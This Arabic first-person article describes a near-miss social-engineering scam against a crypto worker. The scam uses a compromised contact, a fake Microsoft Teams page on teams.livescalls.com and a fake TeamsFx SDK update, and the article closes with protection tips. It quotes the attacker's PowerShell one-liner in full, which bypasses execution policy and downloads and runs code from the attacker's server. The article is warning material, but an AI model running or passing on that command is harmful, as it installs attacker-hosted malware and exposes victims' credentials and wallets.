كادت أن أتعرض للاختراق أثناء مكالمة عبر مايكروسوفت تيمز: إليكم كيف تتم عملية الاحتيال

أود أن أخبركم كيف كدت أن أصبح ضحية لمخطط هندسة اجتماعية معقد مصمم لاستغلال شيء عادي وغير ضار ظاهريًا مثل مكالمة مايكروسوفت تيمز اليوم.

خلال معظم التفاعل، لم يبدُ أي شيء غير عادي.

تواصل معي شخص اعتقدت أنه جهة اتصال في المجال لترتيب اجتماع على برنامج مايكروسوفت تيمز، وكان الجانب التعاوني بداخلي أكثر من سعيد بالرد على المكالمة.

تنبيه: الشخص الذي كان على الطرف الآخر كان منتحلاً لشخصيتي وحاول إقناعي بتشغيل برامج ضارة على جهاز الكمبيوتر الخاص بي.

أشارك تجربتي الكاملة هنا لتنبيه الأصدقاء والمعارف والزملاء في مجتمع العملات المشفرة و Web3.

اليوم كدت أكون أنا، وغداً قد يكون شخصاً آخر.

المرحلة الأولى: التحضير – "إلى اللقاء يا صديقي القديم"

عندما تتلقى رسالة من حساب Telegram لشخص تعرفه كموظف رفيع المستوى في وكالة علاقات عامة معروفة في مجال العملات المشفرة، فإن آخر شيء يخطر ببالك هو أنك تتعرض لمحاولة تصيد احتيالي.

لم تكن أي من علامات التحذير المعتادة واضحة على الفور.

لم تكن هذه رسالة خاصة عشوائية.

لم أكن أتحدث عن حساب منتحل شخصية حيث يتم استبدال حرف "i" بحرف "l" بشكل خفي.

كان لديّ سجل محادثات مع ذلك الحساب أيضاً، لذلك اعتقدت أنني أتحدث إلى الشخص الحقيقي على الطرف الآخر.

لم يبدُ أي شيء غريباً حين بدآ محادثة ودية تماماً لإعادة التواصل. وسرعان ما وصل رابط من Calendly لحجز اجتماع مدته 30 دقيقة، ودعوة لمكالمة عبر Microsoft Teams.

كما ذكرت سابقاً، لم يتوقف جهازي عن العمل طوال فترة التفاعل. لقد لمستُ نفس المستوى من الاحترافية والصبر الذي تتوقعه من عضو رفيع المستوى في وكالة علاقات عامة من الطراز الأول.

كل ما كنت أعرفه هو أنني قمت بجدولة اجتماع عبر برنامج Teams من صفحة Calendly الخاصة بأحد جهات الاتصال في المجال.

يبدأ المحتال عملية الاتصال باستخدام حساب مخترق، ويرسل رابط اجتماع عبر برنامج Teams.

المرحلة الثانية: فخ "الانضمام من سطح المكتب فقط"

حلّ يوم الاجتماع، وضغطتُ على رابط اجتماع Teams على هاتفي، كما فعلتُ مراتٍ لا تُحصى من قبل. لكنّني لم أُحوَّل مباشرةً إلى الاجتماع كالمعتاد. فبدلاً من ذلك، ظهرت شاشةٌ كُتب عليها: "لا يُسمح بالوصول إلى هذا الاجتماع من الهاتف بسبب إعدادات المُنظِّم".

"أوه! لم يحدث لي هذا من قبل."

حسناً، لم يكن ذلك مصادفة.

بالنظر إلى الماضي، ربما كان ذلك بمثابة أول جرس إنذار حقيقي.

شاشة الخطأ جزء من التصميم. يحتاج المحتالون إلى جهاز كمبيوتر مكتبي أو محمول لأن حمولتهم الخبيثة عبارة عن برنامج نصي يعمل عبر سطر الأوامر ولا يعمل إلا على أجهزة الكمبيوتر الشخصية.

عنوان URL الموجود في متصفحك " teams.livescalls.com" ليس نطاق مايكروسوفت الفعلي.

تستخدم اجتماعات Teams الشرعية موقع teams.microsoft.com أو teams.live.com.

من بعيد، يبدو النطاق "livescalls.com" مشابهاً تماماً للواقع، ولكن إذا نظرت عن كثب، ستجد أنه في الواقع بعيد جداً عن الحقيقة.

أحدهما موقعٌ تسيطر عليه شركة مايكروسوفت ويتباهى بأكثر من 320 مليون مستخدم نشط يومياً. أما الآخر فهو موقعٌ مزيفٌ تماماً، تسيطر عليه جهاتٌ خبيثة.

صحيح أن بعض المنظمات قد تستخدم نطاقات مخصصة لاجتماعاتها الجماعية. مع ذلك، فإن خسارة أكثر من تريليون دولار أمريكي لصالح المحتالين بحلول عام 2025، وفقًا للمنتدى الاقتصادي العالمي، كانت سببًا كافيًا لعدم تجاهل حدسي.

تمنع صفحة "إشعار الوصول إلى الفريق" المزيفة الوصول من الأجهزة المحمولة، مما يجبر الضحايا على استخدام جهاز كمبيوتر مكتبي حيث يمكن تشغيل البرنامج النصي الخبيث. لاحظ عنوان URL: teams.livescalls.com، وهو ليس نطاقًا تابعًا لشركة مايكروسوفت.

بعد حظر الأجهزة المحمولة، يضغط المحتال على الضحية للتسجيل عبر جهاز الكمبيوتر، مدعياً أن "الشركاء ينتظرون".

الخطوة 3: الحمولة: "قم بتحديث حزمة تطوير البرامج (SDK) الخاصة بـ TeamsFx"

بمجرد الوصول إلى سطح المكتب، عرض اجتماع Teams الوهمي صفحة مصممة باحترافية، تشبه ما هو موجود في وثائق مايكروسوفت الرسمية. بل إنها تضمنت نص مايكروسوفت الأصلي، الذي ينص على أن حزمة تطوير البرامج TeamsFx SDK ستتوقف عن العمل بحلول سبتمبر 2025.

الحل؟ انسخ جزءًا من التعليمات البرمجية وقم بتشغيله في الطرفية أو موجه الأوامر.

إذا أجريت بحثًا إضافيًا على جوجل، ستجد أن هناك حزمة تطوير برمجية (SDK) مشابهة. أنت ببساطة لست بحاجة إليها في اجتماع الفريق هذا.

للوهلة الأولى، يبدو الكود غير ضار: فهو يُعيّن متغيرات بيئية بأسماء رسمية مثل TeamsFx_API_KEY وMS_Teams_API_SECRET. لكنّ ثغرة الهجوم الحقيقية تكمن في مكان ما بينهما، وهؤلاء المهاجمون لا يعتمدون على قدرتك على تحديد المشكلة بدقة.

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

يتجاوز هذا السطر الواحد سياسات أمان PowerShell (-ep bypass)، ويقوم بتنزيل التعليمات البرمجية من خادم المهاجم، وينفذها على الفور (iex = Invoke-Expression).

وفي لحظة، يتم تثبيت أي برامج ضارة أو برامج تسجيل ضغطات المفاتيح أو أدوات الوصول عن بعد التي يستضيفها المهاجمون بصمت على جهازك.

تعرض واجهة اجتماع Teams المزيفة صفحةً خبيثة بعنوان "تحديث حزمة تطوير البرامج TeamsFx" للمشاركين. لاحظ المشاركين في المكالمة: مقاطع فيديو مُولّدة بواسطة الذكاء الاصطناعي.

المرحلة الرابعة: مرحلة الضغط "لا تقلق، الأمر آمن"

عندما أعربت عن ترددي في تشغيل البرنامج النصي، قام المحتال على الفور بطمأنتي والضغط عليّ.

كان من المفترض أن تساعدني عبارة "لا تقلق، الأمر بسيط للغاية وآمن بالنسبة لك" في اتباع التعليمات الموجودة في لقطة الشاشة التي توضح لي كيفية فتح موجه الأوامر على جهاز الكمبيوتر الخاص بي.

كان ينبغي أن يضغط عليّ قول "لقد انضم الشركاء بالفعل على Zoom" لكي لا أجعل الجميع يغيرون المنصات لأنني لم أستطع معرفة كيفية تشغيل موجه أوامر بسيط.

لم أشعر بالاطمئنان. ولم أشعر حتى بالضغط.

عندما اقترحتُ نقل المكالمة إلى جوجل ميت، رفضوا. يبدو أن حيلتهم لا تنجح إلا من خلال إعداد برنامج Teams المزيف الخاص بهم.

يرسل المحتال تعليمات مفصلة لتنفيذ الشفرة الخبيثة، مطمئناً الضحية: "لا تقلق، الأمر بسيط للغاية وآمن بالنسبة لك".

المرحلة الخامسة: تم كشف الخدعة – تم صدها وإخراجها

تأكدت من شكوكي بعد فحص النص والنطاق: لقد كنت ضحية للهندسة الاجتماعية وعلى وشك أن يتم إدراجي في إحصاءات المنتدى الاقتصادي العالمي لعام 2026.

أخبرتُ المحتال مباشرةً: "لقد تحققتُ للتو، وهذا الأمر وهذا الموقع الإلكتروني غير شرعيين. للأسف، لن أتمكن من فعل ذلك." وعرضتُ عليه مواصلة المحادثة عبر جوجل ميت إذا كان لا يزال يرغب في الدردشة.

"لكن الاجتماع جارٍ الآن"، كانت هذه هي الرسالة من الطرف الآخر.

وكما هو متوقع، كان ردهم يهدف إلى توضيح مدى إلحاح انضمامي للمكالمة. ففي النهاية، لا أريد أن أجعل جميع هؤلاء الشركاء ينتظرون لفترة طويلة.

وبعد لحظات، قاموا بحذف جميع مراسلاتنا وحظروني.

أوه… الأمر ليس مجرد جرس إنذار. نحن نتحدث عن درجات من اللون القرمزي.

لا يقوم جهات الاتصال التجارية بمسح سجل محادثاتك بالكامل أو حظرك بمجرد أن تشكك في تحديث برنامج ما.

بعد الإبلاغ عن عملية الاحتيال، يصر المهاجم على أن الاجتماع "جارٍ" قبل حذف جميع الرسائل وحظر الضحية.

كيفية حماية نفسك

يتزايد هذا النوع من الهجمات بسرعة في قطاعات العملات المشفرة، وتقنيات الويب، والتكنولوجيا بشكل عام. يقوم المحتالون باختراق أو انتحال حسابات حقيقية تعود لمتخصصي العلاقات العامة، والمستثمرين، ومديري المشاريع لاستهداف الأفراد ذوي القيمة العالية. إليك كيفية حماية نفسك:

لا تقم بتشغيل أي أوامر من صفحة الاجتماع. لن تطلب منك أي منصة مكالمات فيديو شرعية لصق أي كود في سطر الأوامر أو موجه الأوامر.
تحقق من عنوان URL. اجتماعات Microsoft Teams الحقيقية تُعقد مباشرةً على teams.microsoft.com أو teams.live.com، وليس على "teams.livescalls.com" أو نطاقات أخرى مماثلة.
احذر من متطلبات "الاستخدام على سطح المكتب فقط". إذا كان الاجتماع يمنع الوصول عبر الهاتف المحمول، فهذه حيلة متعمدة لإجبارك على استخدام جهاز كمبيوتر لتشغيل البرامج النصية.
تحقق من هوية الشخص عبر قناة منفصلة. إذا أرسل لك أحد معارفك رابط اجتماع غير معتاد، فاتصل به مباشرةً أو راسله على منصة أخرى للتأكد.
احذر من استخدام الأمر "powershell -ep bypass" والأمر "iex". فهذان الأمران هما مؤشران رئيسيان على وجود مخاطر في أي برنامج نصي. الأول يعطل الحماية، والثاني ينفذ الكود الذي تم تنزيله دون أي رقابة.
إذا كنت قد شغّلت البرنامج النصي بالفعل: افصل اتصالك بالإنترنت فورًا. قم بإجراء فحص كامل للبرامج الضارة (باستخدام Malwarebytes أو Windows Defender Offline). غيّر جميع كلمات المرور على جهاز آخر نظيف. راقب محافظ العملات الرقمية وحساباتك المصرفية بحثًا عن أي معاملات غير مصرح بها.

لماذا يُعد هذا الأمر مهمًا بالنسبة للعملات المشفرة و Web3

لا أعتبر هذا تفاعلاً نموذجياً للتصيد الاحتيالي، حيث يقوم المهاجمون بإلقاء شبكة واسعة ومعرفة ما يمكنهم الحصول عليه.

لا، لقد كانت عملية هندسة اجتماعية مُستهدفة استمرت لعدة أيام. تنكر المهاجمون في هيئة نظرائهم في المجال لعدة أيام، وبنوا علاقات ودية، ورتبوا لإرشادك بشكل عفوي خلال مكالمة عبر برنامج Teams من خلال صفحة مزيفة مُقنعة من مايكروسوفت.

سواء قاموا بسرقة بيانات اعتمادك، أو استنزاف محفظة العملات المشفرة الخاصة بك، أو تثبيت برامج ضارة مستمرة للوصول عن بعد، فإن المهاجمين لديهم كل شيء ليكسبوه ولا شيء ليخسروه.

إذا كنت مؤسسًا أو مستثمرًا أو أي شخص يحضر اجتماعات صناعة العملات المشفرة والتكنولوجيا، فشارك هذه المقالة مع فريقك. فالأشخاص الذين يديرون هذه عمليات الاحتيال يتطورون باستمرار، والوسيلة الوحيدة للوقاية هي الوعي.

شارك هذا:

المرحلة الأولى: التحضير – "إلى اللقاء يا صديقي القديم"

المرحلة الثانية: فخ "الانضمام من سطح المكتب فقط"

الخطوة 3: الحمولة: "قم بتحديث حزمة تطوير البرامج (SDK) الخاصة بـ TeamsFx"

المرحلة الرابعة: مرحلة الضغط "لا تقلق، الأمر آمن"

المرحلة الخامسة: تم كشف الخدعة – تم صدها وإخراجها

كيفية حماية نفسك

لماذا يُعد هذا الأمر مهمًا بالنسبة للعملات المشفرة و Web3

شارك هذا:

المنشورات ذات الصلة